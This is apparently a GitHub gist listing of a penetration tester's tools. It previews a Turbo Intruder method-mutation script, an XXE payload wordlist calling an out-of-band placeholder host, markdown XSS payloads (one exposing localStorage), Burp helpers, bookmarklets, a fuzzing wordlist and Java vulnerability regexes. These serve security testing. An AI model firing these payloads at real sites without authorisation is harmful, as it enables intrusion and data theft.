MOHAMMAD SAQLAIN mrrootsec

@mrrootsec
mrrootsec / MutateMethods.py
Created February 15, 2026 04:39 — forked from defparam/MutateMethods.py
Example of using Turbo Intruder in a "listen and attack" mode. Because Turbo Intruder's Jython interpreter is technically inside Burp, you can have Turbo Intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside Turbo Intruder, mutating the method.
from threading import Thread
import time
class TrafficMagnet(burp.IProxyListener):
    def __init__(self):
        callbacks.registerProxyListener(self)
        self._helpers = callbacks.getHelpers()
        self._callbacks = callbacks
@mrrootsec
mrrootsec / xxe-payloads.txt
Created February 15, 2026 04:38 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@mrrootsec
mrrootsec / settings.json
Created February 15, 2026 03:28
Config of Filemarker extension for manual security code review
{
  "markerTypes": [
    {
      "id": "secure",
      "badge": "🔐",
      "color": "editorHint.foreground",
      "label": "Secure"
    },
    {
      "id": "done",
@mrrootsec
mrrootsec / Cleaner.py
Created January 27, 2026 08:57
Get rid of junk headers
# -*- coding: utf-8 -*-
"""
Burp Suite Extension (Jython / Python 2.7)
Adds a Repeater request-editor context menu item that removes "unnecessary"
browser/client-hint headers:
- Sec-Fetch-*
- Sec-CH-* (a.k.a. Sec-Ch-*)
How it integrates with Burp:
javascript:(function(){const avoidParams=['aspsessionid','asp.net_sessionid','__eventtarget','__eventargument','__viewstate','__eventvalidation','jsessionid','cfid','cftoken','phpsessid','session_id'];const shouldAvoid=(n)=>{const l=n.toLowerCase();return avoidParams.includes(l)||/^aspsessionid.*/.test(l)};const hiddenInputs=document.querySelectorAll('input[type="hidden"]');let params=new URLSearchParams();let extractedParams={};hiddenInputs.forEach(input=>{const name=input.name;const value=input.value||'xxxx';if(!name||shouldAvoid(name))return;params.append(name,value);extractedParams[name]=value});const url=new URL(window.location);params.forEach((value,key)=>{url.searchParams.append(key,value)});const logData={timestamp:'2025-10-24 02:47:10',user:'mosaqlain_deloitte',currentUrl:window.location.href,newUrl:url.toString(),extractedHiddenInputs:extractedParams,totalExtracted:Object.keys(extractedParams).length};console.log('=== HIDDEN INPUT EXTRACTOR LOG ===');console.log('Timestamp (UTC):', logData.timestamp
@mrrootsec
mrrootsec / fetch2BurpRAW.js
Last active October 24, 2025 04:45
Convert fetch to Burp RAW Request
javascript:(function(){const c='burp_converter_'+Date.now(),d=document.createElement('div');d.id=c;d.innerHTML='<div style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);width:90%;max-width:800px;max-height:90vh;background:#f5f5f5;border:2px solid #333;border-radius:8px;box-shadow:0 4px 20px rgba(0,0,0,0.3);z-index:999999;font-family:\'Courier New\',monospace;overflow:hidden;display:flex;flex-direction:column"><div style="background:#222;color:#fff;padding:12px 16px;font-weight:bold;font-size:14px;display:flex;justify-content:space-between;align-items:center"><span>Fetch to Burp Converter</span><button id="'+c+'_close" style="background:#ff4444;color:white;border:none;padding:4px 8px;border-radius:3px;cursor:pointer;font-weight:bold">×</button></div><div style="flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:16px"><div><label style="display:block;margin-bottom:6px;font-weight:bold;font-size:12px">Input (fetch call, object, or raw HTTP):</label><textarea id="'+c+'_in
@mrrootsec
mrrootsec / List of API endpoints & objects
Created August 20, 2025 03:39 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
Links:
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
Images:
@mrrootsec
mrrootsec / Json_columns.bambda
Created July 5, 2025 16:45
JSON param key as column name
name: JSON param key as column name
function: VIEW_FILTER
location: PROXY_HTTP_HISTORY
source: |+
  /**
   * Extracts a JSON parameter and creates a column named after the parameter.
   * @author mrrootsec
   */
  var req = requestResponse.request();
@mrrootsec
mrrootsec / README.md
Created June 29, 2025 11:42 — forked from win3zz/README.md
Useful regex patterns to find vulnerabilities in Java code and Java security code review tools

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

  • Generic Passwords / Secrets / Tokens:

    • Regex: